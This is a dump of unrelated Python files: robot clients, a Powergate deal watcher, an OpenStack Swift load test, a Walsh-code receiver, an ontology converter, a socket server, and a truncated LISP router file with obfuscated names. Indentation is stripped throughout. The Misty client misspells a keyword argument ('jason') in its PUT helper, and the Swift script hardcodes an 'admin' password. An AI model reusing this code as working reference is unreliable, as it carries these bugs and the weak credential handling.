client = AsyncClient(ip, port, usePiCam)
comms_client = comms.AsyncClient(ip, port + 1)  # keep the comms module name unshadowed
@client.on_get_frame()
def read_frame():
ret, frame = cap.read()
if ret:
h, w, _ = frame.shape
frame = cv2.resize(frame, (int(w / size), int(h / size)))
return frame
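# Note: read_frame is only meaningful for the cv2 path; with --usepicam the
# AsyncClient is assumed to capture frames itself (cap is undefined in that case).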
@comms_client.on_msg()
async def on_msg(msg):
#print(msg)
if "speed" in msg and "angle" in msg and not disableMotor:
controller.drive(msg["speed"], msg["angle"])
def comms_thread():
asyncio.run(comms_client.connect())
# start comms client on a separate daemon thread so it cannot block interpreter exit
t = threading.Thread(target=comms_thread, daemon=True)
t.start()
try:
asyncio.run(client.connect())
except KeyboardInterrupt:
pass
finally:
comms_client.close()
client.close()
controller.stop()
|
misty_wc.py | import json
from enum import Enum
import requests
import sys
import threading
from time import sleep
import websocket
from logging import getLogger
_logger = getLogger()
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if type(obj) in PUBLIC_ENUMS.values():
return str(obj.value)
if callable(obj):
return ""
result = obj.__dict__
result['__class_name__'] = obj.__class__.__name__
return result
class MistyEventInequality(Enum):
Equal = "=="
Greater = ">"
GreaterOrEqual = ">="
Less = "<"
LessOrEqual = "<="
class EventCondition:
Property = ""
Inequality = MistyEventInequality.Equal
Value = ""
def __init__(self, property, inequality, value):
self.Property = property
if isinstance(inequality, MistyEventInequality):
self.Inequality = inequality
self.Value = value
# global stuff
PUBLIC_ENUMS = {
'MistyEventInequality': MistyEventInequality,
# ...
}
_je = JSONObjectEncoder()
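# Example: _je.encode(EventCondition("SensorPosition", MistyEventInequality.Equal, "Right"))
# produces (key order aside):
#   {"Property": "SensorPosition", "Inequality": "==", "Value": "Right",
#    "__class_name__": "EventCondition"}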
class MistyWsEvent:
def __init__(self, ws_type, event_name, debounce, eventConditions, onMessage = None):
self.Operation = "subscribe"
self.Type = ws_type
self.EventName = event_name
self.DebounceMs = debounce
self.EventConditions = []
self.onMessage = onMessage
if isinstance(eventConditions, list) and len(eventConditions) > 0 and isinstance(eventConditions[0], EventCondition):
for ec in eventConditions:
self.EventConditions.append(ec)
def getSubscribeMsg(self):
return _je.encode(self)
def getUnsubscribeMsg(self):
return '{"Operation": "unsubscribe","EventName": "' + self.EventName + '"}'
def onMessageReceived(self, msg):
# Code here
_logger.debug(msg)
try:
if self.onMessage is not None and callable(self.onMessage):
self.onMessage(msg)
except Exception:
_logger.error("Unexpected error: %s", sys.exc_info()[0])
return
class MistyWebClient:
def __init__(self, baseUrl):
self.MistyEvents = dict()
self.IsOpen = False
self.IsInError = False
self.IsClosed = False
self.BaseUrl = baseUrl
self.BaseApiUrl = "http://" + self.BaseUrl + "/api/"
self.ConnectTimeout = 2
self.ResponseTimeout = 20
def getJson(self, obj):
if hasattr(obj, "__dict__") or isinstance(obj, list):
return _je.encode(obj)
else:
return obj
def get(self, url, qs = "", headers = ""):
return requests.get(self.BaseApiUrl + url, params = qs, headers = headers, timeout = (self.ConnectTimeout, self.ResponseTimeout))
def post(self, url, data = None, json = None, headers = ""):
return requests.post(self.BaseApiUrl + url, data = data, json = json, timeout = (self.ConnectTimeout, self.ResponseTimeout))
def put(self, url, data = None, json = None, headers = ""):
return requests.put(self.BaseApiUrl + url, data = data, jason = json, timeout = (self.ConnectTimeout, self.ResponseTimeout))
def delete(self, url, qs = "", headers = ""):
return requests.delete(self.BaseApiUrl + url, params = qs, headers = headers, timeout = (self.ConnectTimeout, self.ResponseTimeout))
def addEvent(self, mistyWsEvent : MistyWsEvent):
if not isinstance(mistyWsEvent, MistyWsEvent):
raise TypeError
self.MistyEvents.update({mistyWsEvent.EventName : mistyWsEvent})
if self.IsOpen == True:
self.subscribe(mistyWsEvent)
def subscribe(self, mistyWsEvent : MistyWsEvent):
if self.IsOpen == False:
return
self.unsubscribe(mistyWsEvent)
msg = mistyWsEvent.getSubscribeMsg()
self.ws.send(msg)
sleep(1)
def unsubscribe(self, mistyWsEvent : MistyWsEvent):
if self.IsOpen == False:
return
msg = mistyWsEvent.getUnsubscribeMsg()
self.ws.send(msg)
sleep(1)
def removeEvent(self, eventName):
mistyWsEvent = self.MistyEvents.get(eventName, None)
if mistyWsEvent is not None:
self.unsubscribe(mistyWsEvent)
self.MistyEvents.pop(eventName, None)
def on_open(self):
_logger.debug("Openned")
self.IsOpen = True
def on_error(self, error):
_logger.error(error)
self.IsInError = True
def on_close(self):
_logger.debug("Listening Ended")
self.IsInError = False
self.IsOpen = False
self.IsClosed = True
def on_message(self, message):
try:
msgParsed = self.parseMsg(message)
if msgParsed is None: return
eventKey = msgParsed["eventName"]
event = self.MistyEvents.get(eventKey)
if event != None :
event.onMessageReceived(msgParsed)
_logger.debug(message)
except Exception:
_logger.error("Unexpected error: %s", sys.exc_info()[1])
_cnt = 10
def parseMsg(self, msg):
msgParsed = {}
try:
msgParsed = json.loads(msg)
if type(msgParsed["message"]) is not dict :
if "Cannot register" in msgParsed["message"]:
_logger.debug(msgParsed["message"])
#self.stop_listener()
return None
if "registered" in msgParsed["message"]:
_logger.debug(msgParsed["message"])
#self.stop_listener()
return None
except Exception:
_logger.error("Unexpected error: %s", sys.exc_info()[1])
return None
return msgParsed
def startListen(self, ip = "", enableTrace = False):
if ip == "" :
ip = self.BaseUrl
websocket.enableTrace(enableTrace)
wsPath = "ws://" + ip + "/pubsub"
self.ws = websocket.WebSocketApp(wsPath,
keep_running=True,
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close)
self.ws_thread = threading.Thread(target=self.ws.run_forever)
self.ws_thread.daemon = True
self.ws_thread._running = True
self.ws_thread.start()
print('Websocket thread started')
cnt = 0
while (not self.IsOpen) and cnt < 5:
sleep(1)
cnt += 1
if not self.IsOpen:
self.ws.close()
raise TimeoutError("Can't open Web Socket")
for e in self.MistyEvents.values():
self.subscribe(e)
return self.ws
def stopListen(self):
for e in self.MistyEvents.values():
self.unsubscribe(e)
self.ws.close()
def _module_init():
_logger.debug("init misty_wc")
__all__ = ["MistyEventInequality", "EventCondition", "MistyWsEvent", "MistyWebClient"]
# Tests:
def onMsg(msg):
print(msg["message"]["distanceInMeters"])
ec = EventCondition("SensorPosition", MistyEventInequality.Equal, "Right")
tofrrEvent = MistyWsEvent("TimeOfFlight", "tof_r_r", 1000, [ec], onMsg)
print(tofrrEvent.getSubscribeMsg())
print(tofrrEvent.getUnsubscribeMsg())
# mwc = MistyWebClient("169.254.206.171")
# mwc.post("led", json='{"red":0, "green":0, "blue":250}')
# mwc.startListen()
# mwc.addEvent(tofrrEvent)
# j = mwc.getJson({"red":0, "green": 250, "blue": 0})
# print(j)
# mwc.post("led", json= j)
# sleep(5)
# mwc.post("led", json={"red":250, "green": 0, "blue": 0})
# mwc.stopListen()
# mwc.removeEvent(tofrrEvent)
# resp = mwc.post("led", json={"red":0, "green": 0, "blue": 250})
# print(resp)
|
deal_watcher.py | from pygate_grpc.client import PowerGateClient
from pygate_grpc.ffs import get_file_bytes, bytes_to_chunks, chunks_to_bytes
from google.protobuf.json_format import MessageToDict
import redis
import json
import time
import threading
import fast_settings
import queue
import sqlite3
import coloredlogs
import logging
import sys
deal_watcher_logger = logging.getLogger(__name__)
formatter = logging.Formatter(u"%(levelname)-8s %(name)-4s %(asctime)s,%(msecs)d %(module)s-%(funcName)s: %(message)s")
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.DEBUG)
# stdout_handler.setFormatter(formatter)
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setLevel(logging.ERROR)
deal_watcher_logger.addHandler(stdout_handler)
deal_watcher_logger.addHandler(stderr_handler)
coloredlogs.install(level='DEBUG', logger=deal_watcher_logger, stream=sys.stdout)
with open('settings.json') as f:
settings = json.load(f)
deals = dict()
deals_lock = threading.Lock()
def main():
r = redis.StrictRedis(
host=settings['REDIS']['HOST'],
port=settings['REDIS']['PORT'],
db=settings['REDIS']['DB'],
password=settings['REDIS']['PASSWORD']
)
p = r.pubsub()
p.subscribe('new_deals')
while True:
update = p.get_message(ignore_subscribe_messages=True)
if update:
deal_watcher_logger.debug('Got new deal update')
deal_watcher_logger.debug(update)
deal_to_be_watched = json.loads(update['data'])
deals_lock.acquire()
deals[deal_to_be_watched['jid']] = deal_to_be_watched
deals_lock.release()
deal_watcher_logger.debug('Current Deals to be watched set')
deal_watcher_logger.debug(deals)
time.sleep(5)
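# Judging by the fields used below, a 'new_deals' message is assumed to be a
# JSON object of roughly this shape:
#   {"jid": "<powergate job id>", "token": "<FFS auth token>", "cid": "<content id>"}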
def job_checker():
sqlite_conn = sqlite3.connect('auditprotocol_1.db')
sqlite_cursor = sqlite_conn.cursor()
pow_client = PowerGateClient(fast_settings.config.powergate_url, False)
while True:
done_deal_jids = list()
deals_lock.acquire()
for deal_jid, deal in deals.items():
j_stat = pow_client.ffs.get_storage_job(jid=deal['jid'], token=deal['token'])
# print(j_stat.job)
if j_stat.job.status == 5: # 'JOB_STATUS_SUCCESS':
deal_watcher_logger.debug('Hurrah. Removing from deals to be watched...')
deal_watcher_logger.debug(j_stat.job)
done_deal_jids.append(deal_jid)
# update status
sqlite_cursor.execute("""
UPDATE accounting_records SET confirmed=1 WHERE cid=?
""", (deal['cid'], ))
sqlite_cursor.connection.commit()
elif j_stat.job.status == 3:  # 'JOB_STATUS_FAILED'
deal_watcher_logger.error('Job failed. Removing from deals to be watched...')
deal_watcher_logger.error(j_stat.job)
done_deal_jids.append(deal_jid)
# update status
sqlite_cursor.execute("""
UPDATE accounting_records SET confirmed=2 WHERE cid=?
""", (deal['cid'],))
sqlite_cursor.connection.commit()
for each_done_jid in done_deal_jids:
del deals[each_done_jid]
deals_lock.release()
time.sleep(5)
if __name__ == '__main__':
t1 = threading.Thread(target=main)
t2 = threading.Thread(target=job_checker)
t1.start()
t2.start()
t1.join()
t2.join() |
time3.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import time
import random
import datetime
from swiftclient import client
import threading
'''
if raw_input("restart swift or not (y/n):")=='y':
for k in os.popen('sudo python setup.py install').readlines():
pass
for j in os.popen('sudo swift-init main restart').readlines():
pass
# print j,
# time.sleep(0.02)
'''
def test(u,t):
#print "---",datetime.datetime.now()
try:
client.get_object(u,t,"ytf" ,"1.mp3" )
except:
pass
#print "***",datetime.datetime.now()
name = raw_input("Please input the name(for token):")
while not name:
name = raw_input("Please input the name(for token):")
if name == "Admin" or name == "sandy":
content = os.popen("curl -D- -H 'X-Storage-User:%s' -H 'X-Storage-Pass:admin' http://127.0.0.1:8080/auth/v1.0" %name).readlines()
else:
content = os.popen("curl -D- -H 'X-Storage-User:%s' http://127.0.0.1:8080/auth/v1.0" %name).readlines()
token = content[2].strip()
url = content[1].split(':',1)[-1].strip()
#for i in content:
# print i,
# time.sleep(0.3)
#print token
#getmethod = os.popen("curl -k -X GET -H '%s' %s" %(token,url)).readlines()
#for dd in getmethod:
# print dd,
# time.sleep(0.3)
geturl = '/'.join([url,'ytf9/'])
#print "curl -X GET -H '%s' %s"%(token,geturl)
#print "curl -X PUT -T ./1.txt -D- -H 'object_name:小酒窝' -H 'parent_secl_id:7' -H 'obj_seclevel:4' -H 'Content-Type:audio/mp3' -H '%s' %s" %(token,url)
t1 = 1
t2 = 100
token = token.split(": ")[-1]
global sum
sum = 0
r = random.randint(1,104)
#str1 = "curl -s -X GET -H '%s' %s/ytf%s/%sytf%s.txt"%(token,url,r,r,random.randint(1,10000))
try:
#str1=client.get_object(url,token,"ytf%s" % r,"%sytf%s.txt" % (r,random.randint(1,10000)))
str1=client.get_object(url,token,"ytf" ,"1.mp3" )
print str1
except Exception as e:
print e
threadpool=[]
for i in xrange(t1*t2):
th = threading.Thread(target = test,args = (url,token))
threadpool.append(th)
time1 = datetime.datetime.now()
print time1
for th in threadpool:
th.start()
for th in threadpool:
th.join()
'''
for y in range(t1):
for x in range(t2):
r = random.randint(1,104)
try:
client.get_object(url,token,"ytf%s" % r,"%sytf%s.txt" % (r,random.randint(1,10000)))
except:
pass
'''
time2 = datetime.datetime.now()
print time2
print (time2-time1).microseconds
print (time2-time1).seconds
print '\033[1;31;40m'
print '*' * 50
print "OpenStack Swift Url:\t",url
print "Access User Name:\t",name
print "Average access time:\t",((time2-time1).microseconds/1000.000+((time2-time1).seconds)*1000)/(t1*t2),"ms"
print "File Numbers:\t\t","1049948"
print '*' * 50
print '\033[0m'
|
receiver.py | '''Receiver Module for receiving encoded data and decoding'''
import sys
import const
import threading
from datetime import datetime
# curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
class Receiver:
'''Receiver Class to receive sender sent encoded data and decode it to get the original data'''
def __init__(self, name, wls_table, channel_to_receiver):
self.name = name
self.wls_table = wls_table
self.channel_to_receiver = channel_to_receiver
self.sender_to_receiver = self.select_sender()
self.code_length = len(self.wls_table[0])
def select_sender(self):
'''Decides which sender this receiver listens to (receiver i pairs with sender i)'''
return self.name
def get_char(self, data):
'''Receives character sent by sender'''
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
with open('textfiles/logfile.txt', 'a+', encoding='utf-8') as rep_file:
rep_file.write("\n\n{} ||| DATA : {}".format(curr_datetime, str(data)))
summation = 0
for i in range(8): summation += pow(2,i) * data[7-i]
character = chr(summation)
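# e.g. data = [0, 1, 0, 0, 0, 0, 0, 1] (MSB first) -> 0b01000001 -> 65 -> 'A'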
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
with open('textfiles/logfile.txt', 'a+', encoding='utf-8') as rep_file:
rep_file.write("\n\n{} ||| CHAR RECEIVED : {}\n".format(curr_datetime, character))
return character
def open_file(self, sender):
'''Opens output file and writes down decoded message'''
try:
file_name = const.output_file_path + 'output' + str(sender+1) + '.txt'
fptr = open(file_name, 'a+', encoding='utf-8')
except FileNotFoundError as fnfe:
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
print("{} EXCEPTION CAUGHT : {}".format(curr_datetime, str(fnfe)))
sys.exit("No file exists with name {} !".format(file_name))
return fptr
def receive_data(self):
'''Receives Walsh encoded sender data and decodes it'''
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
with open('textfiles/logfile.txt', 'a+', encoding='utf-8') as rep_file:
rep_file.write("\n{} ||| RECEIVER-{} || RECEIVES DATA FROM SENDER-{}".format(curr_datetime, self.name+1, self.sender_to_receiver+1))
total_data = []
while True:
channel_data = self.channel_to_receiver.recv()
# extract data
summation = 0
for i in range(len(channel_data)): summation += channel_data[i] * self.wls_table[self.sender_to_receiver][i]
# extract data bit
summation /= self.code_length
if summation == 1: bit = 1
elif summation == -1: bit = 0
else: bit = -1
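# Walsh codes are mutually orthogonal, so the normalized dot product above is
# +1 when this sender transmitted a 1, -1 for a 0; anything else (e.g. 0 when
# the sender was silent for that chip interval) maps to the -1 sentinel.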
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
with open('textfiles/logfile.txt', 'a+', encoding='utf-8') as rep_file:
rep_file.write("\n{} ||| RECEIVER-{} || BIT RECEIVED : {}".format(curr_datetime, self.name+1, bit))
if len(total_data) < 8 and bit != -1: total_data.append(bit)
if len(total_data) == 8:
character = self.get_char(total_data)
output_file = self.open_file(self.sender_to_receiver)
output_file.write(character)
output_file.close()
total_data = []
def start_receiver(self):
'''Initializes and terminates the receiver thread'''
receiver_thread = threading.Thread(name='Receiver-Thread', target=self.receive_data)
receiver_thread.start()
receiver_thread.join()
|
otb2owl.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: houzhiwei
# time: 2019/2/20 22:11
# TODO
from owlready2 import *
import json
import re
from JSON2OWL.OwlConvert.OwlUtils import OWLUtils
from JSON2OWL.OwlConvert.Preprocessor import Preprocessor
import datetime
module_uri = 'http://www.egc.org/ont/process/otb'
onto = get_ontology(module_uri)
# onto, skos, dcterms, props = OWLUtils.load_common(onto)
onto, shacl, skos, dcterms, props, foaf = OWLUtils.load_common(onto)
onto, geospatial = OWLUtils.load_geo_vocabl(onto)
onto, gb, task, data, cyber, context = OWLUtils.load_common_for_process_tool(onto)
print('ontologies imported')
with onto:
class OTBTool(gb.GeoprocessingFunctionality):
pass
class OTBInput(cyber.Input):
pass
class OTBOutput(cyber.Output):
pass
class OTBConstraint(cyber.Constraint):
pass
class OTBAvailableChoice(cyber.AvailableChoice):
pass
class OTBOption(cyber.Option):
pass
onto.metadata.creator.append('houzhiwei')
onto.metadata.title.append('Orfeo-Toolbox Tools')
onto.metadata.created.append(datetime.datetime.today())
onto.metadata.versionInfo.append('6.6.1')
def handle_task(tool, category, task_name, des):
config = OWLUtils.get_config(module_path + '/config.ini')
task_cls = config.get('task', category)
# avoid duplicate
i_task_name = task_name.replace(' ', '_')
if not task[i_task_name + "_task"]:
task_ins = task[task_cls](i_task_name + "_task", prefLabel=locstr(task_name + " task", lang='en'))
task_ins.isAtomicTask = True
task_ins.identifier = i_task_name
else:
task_ins = task[i_task_name + "_task"]
if task_ins not in tool.usedByTask:
tool.usedByTask.append(task_ins)
if tool not in task_ins.processingTool:
task_ins.processingTool.append(tool)
task_ins.description.append(locstr(des, lang='en'))
def get_datatype(k):
config = OWLUtils.get_config(module_path + '/config.ini')
_type = OWLUtils.get_option(config, 'datatype', k)
if _type is None:
return 'http://www.w3.org/2001/XMLSchema#string'
else:
return _type
def handle_parameters(tool, param):
# some parameters do not carry attributes such as isInputFile
p = None
parameterName = param['parameterName']
_name = Preprocessor.io_name(parameterName,onto)
if 'isInputFile' in param.keys() and param['isInputFile']:
p = OTBInput(_name,prefLabel=locstr(parameterName, lang='en'))
# p = OTBInput(0, prefLabel=locstr(param['name'], lang='en'))
tool.input.append(p)
p.isInput = param['isInputFile']
p.supportsDataFormat.append(data.GeoTIFF)
OWLUtils.link_to_domain_concept(p, parameterName.replace('_', ' '))
elif 'isOutputFile' in param.keys() and param['isOutputFile']:
p = OTBOutput(_name,prefLabel=locstr(parameterName, lang='en'))
# p = OTBOutput(0, prefLabel=locstr(parameterName, lang='en'))
tool.output.append(p)
p.isOutput = param['isOutputFile']
p.supportsDataFormat.append(data.GeoTIFF)
OWLUtils.link_to_domain_concept(p, parameterName.replace('_', ' '))
if p is None:
return  # parameter is neither input nor output
p.flag = param['flag']
p.identifier = parameterName
if 'dataType' in param.keys() and param['dataType']:
p.datatypeInString.append(param['dataType'])
p.datatype.append(OWLUtils.get_datatype_iris(param['dataType']))
p.description.append(locstr(' '.join(param['explanation']), lang='en'))
# p.isOptional = param['isOptional'] # no this information in document
def handle_options(tool, param, _onto):
parameterName = param['parameterName']
_name = Preprocessor.io_name(parameterName,_onto)
o = OTBOption(_name,prefLabel=locstr(parameterName, lang='en'))
# p = OTBOption(0, prefLabel=locstr(parameterName, lang='en'))
tool.option.append(o)
o.identifier = parameterName
if 'dataType' in param.keys() and param['dataType']:
if param['dataType'] == "Choices":
o.datatypeInString.append('String')
o.datatypeInString.append(param['dataType'])
# sc.datatype.append(IRIS[get_datatype(param['dataType'])])
o.description.append(''.join(param['explanation']))
# p.isOptional = param['isOptional']
if 'availableChoices' in param.keys() and param['availableChoices']:
o, onto = OWLUtils.handle_choices(o, parameterName, param['availableChoices'], OTBAvailableChoice, _onto)
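# From the fields accessed in map_to_owl/handle_parameters/handle_options, each
# otb.json entry is assumed to look roughly like:
#   {"name": ..., "category": ..., "label": ..., "description": ..., "definition": ...,
#    "manual_url": ..., "command": ..., "authors": ..., "example": [...],
#    "parameters": [{"parameterName": ..., "isInputFile": ..., "isOutputFile": ...,
#                    "flag": ..., "dataType": ..., "explanation": [...]}],
#    "options": [{"parameterName": ..., "dataType": ..., "explanation": [...],
#                 "availableChoices": [...]}]}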
def map_to_owl(json_data):
"""mapping json data to ontology properties"""
for d in json_data:
if d['category'] == 'Deprecated':
continue
name_str = d['name']
toolClass = tool_class(d['category'])
tool = toolClass(name_str, prefLabel=locstr(d['label'], lang='en'))
OWLUtils.application_category(tool, [], d['category'], [])
tool.isToolOfSoftware.append(cyber.OrfeoToolBox)
tool.identifier = name_str
tool.manualPageURL.append(normstr(d['manual_url']))
tool.executable = d['command']
tool.description.append(locstr(d['description'], lang='en'))
tool.definition.append(d['definition'])
keywords = OWLUtils.to_keywords(d['description'])
keywords.extend(d['label'].split(" "))
# keywords=d['label'].split(" ")
OWLUtils.link_to_domain_concept(tool, keywords)
if d['authors']:
tool.authors.append(d['authors'])
for ex in d['example']:
tool.example.append(ex.replace(' . ','.'))
handle_task(tool, d['category'], d['label'], d['description'])
for parameter in d['parameters']:
handle_parameters(tool, parameter)
for option in d['options']:
handle_options(tool, option, onto)
def tool_class(category):
tool_cls = category.replace(' ', '') + 'Tool'
return OWLUtils.create_onto_class(onto, tool_cls, OTBTool)
if __name__ == "__main__":
module_path = os.path.dirname(__file__)
with open(module_path + '/otb.json', 'r') as f:
jdata = json.load(f) # list
# print(len(jdata))
# otherwise will report stack overflow exception
threading.stack_size(2000000)
thread = threading.Thread(target=map_to_owl, args=(jdata,))
thread.start()
thread.join()  # wait for the mapping thread before saving the ontology
onto.save(file='otb.owl', format="rdfxml")
# update task ontology
task.save()
print('OTB Done!')
|
server.py | import socket
import threading
from typing import Tuple
from constants import SERVER_HOST_PORT
def setup_server(address: Tuple[str, int], backlog: int = 100) -> socket.socket:
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind(address)
server_socket.listen(backlog)
return server_socket
def process_client(client_socket: socket.socket) -> None:
while True:
msg = client_socket.recv(1024).decode()
if not msg:
break
fmt_msg = f"msg received: {msg}"
print(fmt_msg)
client_socket.close()
if __name__ == "__main__":
server_socket = setup_server(address=SERVER_HOST_PORT)
print("server is running")
while True:
client_socket, client_address = server_socket.accept()
print(f"{client_address} connected")
client_thread = threading.Thread(target=process_client, args=(client_socket,))
client_thread.start()
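# A minimal client sketch for exercising this server; assumes the same
# SERVER_HOST_PORT tuple from constants:
#
#   import socket
#   from constants import SERVER_HOST_PORT
#   with socket.create_connection(SERVER_HOST_PORT) as s:
#       s.sendall(b"hello server")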
|
lisp-rtr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsulating Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
import commands
import binascii
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = None
Ii1IIii11 = None
Oooo0000 = None
I11 = [ ]
iIiiI1 = None
oo0Ooo0 = ( os . getenv ( "LISP_RTR_FAST_DATA_PLANE" ) != None )
I1I11I1I1I = ( os . getenv ( "LISP_RTR_LATENCY_DEBUG" ) != None )
def O00oooo0O ( parameter ) :
global I11
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" ,
I11 ) )
def Ii1IOo0o0 ( parameter ) :
global I11
return ( lispconfig . lisp_itr_rtr_show_command ( parameter , "RTR" , I11 ,
True ) )
def o00oOO0 ( parameter ) :
return ( lispconfig . lisp_show_crypto_list ( "RTR" ) )
def i11 ( kv_pair ) :
lispconfig . lisp_database_mapping_command ( kv_pair )
def O0O0O ( kv_pair ) :
oO0Oo = { "rloc-probe" : False , "igmp-query" : False }
for O0o0 in kv_pair . keys ( ) :
OO00Oo = kv_pair [ O0o0 ]
if ( O0o0 == "instance-id" ) :
o0O0O00 = OO00Oo . split ( "-" )
oO0Oo [ "instance-id" ] = [ 0 , 0 ]
if ( len ( o0O0O00 ) == 1 ) :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 0 ] )
else :
oO0Oo [ "instance-id" ] [ 0 ] = int ( o0O0O00 [ 0 ] )
oO0Oo [ "instance-id" ] [ 1 ] = int ( o0O0O00 [ 1 ] )
if ( O0o0 == "eid-prefix" ) :
Ii1iIiII1ii1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
Ii1iIiII1ii1 . store_prefix ( OO00Oo )
oO0Oo [ "eid-prefix" ] = Ii1iIiII1ii1
if ( O0o0 == "group-prefix" ) :
i1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
i1 . store_prefix ( OO00Oo )
oO0Oo [ "group-prefix" ] = i1
if ( O0o0 == "rloc-prefix" ) :
iII1 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
iII1 . store_prefix ( OO00Oo )
oO0Oo [ "rloc-prefix" ] = iII1
if ( O0o0 == "rloc-probe" ) :
oO0Oo [ "rloc-probe" ] = ( OO00Oo == "yes" )
if ( O0o0 == "igmp-query" ) :
oO0Oo [ "igmp-query" ] = ( OO00Oo == "yes" )
for iiI111I1iIiI in lisp . lisp_glean_mappings :
if ( iiI111I1iIiI . has_key ( "eid-prefix" ) ^ oO0Oo . has_key ( "eid-prefix" ) ) : continue
if ( iiI111I1iIiI . has_key ( "eid-prefix" ) and oO0Oo . has_key ( "eid-prefix" ) ) :
II = iiI111I1iIiI [ "eid-prefix" ]
Ii1I1IIii1II = oO0Oo [ "eid-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if ( iiI111I1iIiI . has_key ( "group-prefix" ) ^ oO0Oo . has_key ( "group-prefix" ) ) :
continue
if ( iiI111I1iIiI . has_key ( "group-prefix" ) and oO0Oo . has_key ( "group-prefix" ) ) :
II = iiI111I1iIiI [ "group-prefix" ]
Ii1I1IIii1II = oO0Oo [ "group-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if ( iiI111I1iIiI . has_key ( "rloc-prefix" ) ^ oO0Oo . has_key ( "rloc-prefix" ) ) : continue
if ( iiI111I1iIiI . has_key ( "rloc-prefix" ) and oO0Oo . has_key ( "rloc-prefix" ) ) :
II = iiI111I1iIiI [ "rloc-prefix" ]
Ii1I1IIii1II = oO0Oo [ "rloc-prefix" ]
if ( II . is_exact_match ( Ii1I1IIii1II ) == False ) : continue
if ( iiI111I1iIiI . has_key ( "instance-id" ) ^ oO0Oo . has_key ( "instance-id" ) ) : continue
if ( iiI111I1iIiI . has_key ( "instance-id" ) and oO0Oo . has_key ( "instance-id" ) ) :
II = iiI111I1iIiI [ "instance-id" ]
Ii1I1IIii1II = oO0Oo [ "instance-id" ]
if ( II != Ii1I1IIii1II ) : continue
return
lisp . lisp_glean_mappings . append ( oO0Oo )
def iiI1I11i1i ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "RTR" ) )
def IIIII11I1IiI ( mc , parms ) :
i1I , iII1 , OoOO , ooOOO0 = parms
oO00OOoO00 = "{}:{}" . format ( iII1 . print_address_no_iid ( ) , OoOO )
Ii1iIiII1ii1 = lisp . green ( mc . print_eid_tuple ( ) , False )
IiI111111IIII = "Changed '{}' translated address:port to {} for EID {}, {} {}" . format ( ooOOO0 , lisp . red ( oO00OOoO00 , False ) , Ii1iIiII1ii1 , "{}" , "{}" )
for o00oO0oOo00 in mc . rloc_set :
if ( o00oO0oOo00 . rle ) :
for oO0oOo0 in o00oO0oOo00 . rle . rle_nodes :
if ( oO0oOo0 . rloc_name != ooOOO0 ) : continue
oO0oOo0 . store_translated_rloc ( iII1 , OoOO )
I1I1I = oO0oOo0 . address . print_address_no_iid ( ) + ":" + str ( oO0oOo0 . translated_port )
lisp . lprint ( IiI111111IIII . format ( "RLE" , I1I1I ) )
if ( o00oO0oOo00 . rloc_name != ooOOO0 ) : continue
I1I1I = o00oO0oOo00 . rloc . print_address_no_iid ( ) + ":" + str ( o00oO0oOo00 . translated_port )
if ( lisp . lisp_crypto_keys_by_rloc_encap . has_key ( I1I1I ) ) :
oOo0oO = lisp . lisp_crypto_keys_by_rloc_encap [ I1I1I ]
lisp . lisp_crypto_keys_by_rloc_encap [ oO00OOoO00 ] = oOo0oO
o00oO0oOo00 . delete_from_rloc_probe_list ( mc . eid , mc . group )
o00oO0oOo00 . store_translated_rloc ( iII1 , OoOO )
o00oO0oOo00 . add_to_rloc_probe_list ( mc . eid , mc . group )
lisp . lprint ( IiI111111IIII . format ( "RLOC" , I1I1I ) )
if ( lisp . lisp_rloc_probing ) :
o0oOO000oO0oo = None if ( mc . group . is_null ( ) ) else mc . eid
oOO00O = mc . eid if ( mc . group . is_null ( ) ) else mc . group
lisp . lisp_send_map_request ( i1I , 0 , o0oOO000oO0oo , oOO00O , o00oO0oOo00 )
lisp . lisp_write_ipc_map_cache ( True , mc )
return ( True , parms )
def OoOOoOooooOOo ( mc , parms ) :
if ( mc . group . is_null ( ) ) : return ( IIIII11I1IiI ( mc , parms ) )
if ( mc . source_cache == None ) : return ( True , parms )
mc . source_cache . walk_cache ( IIIII11I1IiI , parms )
return ( True , parms )
def o00oo0 ( sockets , hostname , rloc , port ) :
lisp . lisp_map_cache . walk_cache ( OoOOoOooooOOo ,
[ sockets , rloc , port , hostname ] )
return
def o00Oo0oooooo ( sred , packet ) :
